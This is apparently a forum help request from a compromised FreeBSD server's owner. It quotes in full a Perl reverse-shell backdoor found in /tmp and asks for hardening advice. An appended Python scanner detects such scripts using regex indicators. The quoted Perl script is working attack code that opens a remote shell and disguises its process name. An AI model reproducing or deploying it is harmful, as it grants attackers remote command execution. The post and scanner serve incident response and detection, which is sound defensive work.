I have a server, and my whole server is hacked, sites and root.
I reset the passwords of admin & root.
I found this script in /tmp called "back", which was a script to open up a backdoor to grant someone root access.
These are the script's contents:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
I've deleted the script.
The script was chowned to apache:wheel, meaning a hole in apache was the way he got in.
Someone told me that I need security hardening services.
He said this:
Based on the fact your system is FreeBSD 4.10, and that Apache is compiled with OpenSSL/0.9.7d, which is quite old, that's probably why.
What do I need to do? Help me.
Thank you.
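A triage check for the traits visible in the quoted script (Socket import, outbound connect, STDIN/STDOUT/STDERR reopened onto the socket, `$0` overwritten so the process lists as "lynx", a shell spawned), as an added example that is not part of the original post. The function names, indicator names, hit threshold and the inert `SAMPLE` text are assumptions constructed for illustration.

```python
import os
import re
import stat

# Indicators modelled on the "back" script quoted in the post.
INDICATORS = {
    "socket_module": re.compile(r"^\s*use\s+(IO::)?Socket\b", re.M),
    "outbound_connect": re.compile(r"\bconnect\s*\("),
    "stdio_to_socket": re.compile(r"open\s*\(\s*STD(IN|OUT|ERR)\s*,\s*[\"'][<>+]*&"),
    "argv0_rename": re.compile(r"^\s*\$0\s*=(?!=)", re.M),  # hides name in ps
    "spawns_shell": re.compile(r"/bin/(ba|c|k)?sh\b"),
}

# Constructed, non-functional fragment used only to exercise the rules.
SAMPLE = r'''use Socket;
$0 = "lynx";
connect(S, $paddr);
open(STDIN, ">&S");
system("/bin/sh");
'''

def score_text(text):
    """Return the sorted names of indicators present in a script's text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_dir(root, min_hits=3, max_bytes=1 << 20):
    """Walk root; report regular files matching at least min_hits indicators.
    Returns a list of (path, owner_uid, mode_string, hits)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow planted symlinks
                if not stat.S_ISREG(st.st_mode) or st.st_size > max_bytes:
                    continue
                with open(path, "r", errors="replace") as fh:
                    hits = score_text(fh.read())
            except OSError:
                continue  # unreadable or removed mid-scan
            if len(hits) >= min_hits:
                findings.append((path, st.st_uid, stat.filemode(st.st_mode), hits))
    return findings

if __name__ == "__main__":
    import sys
    for path, uid, mode, hits in scan_dir(sys.argv[1] if len(sys.argv) > 1 else "/tmp"):
        print(f"{path} uid={uid} {mode} {','.join(hits)}")
```

Compare the reported uid with the web server account: a hit owned by that account in /tmp or another world-writable directory matches the ownership the post describes.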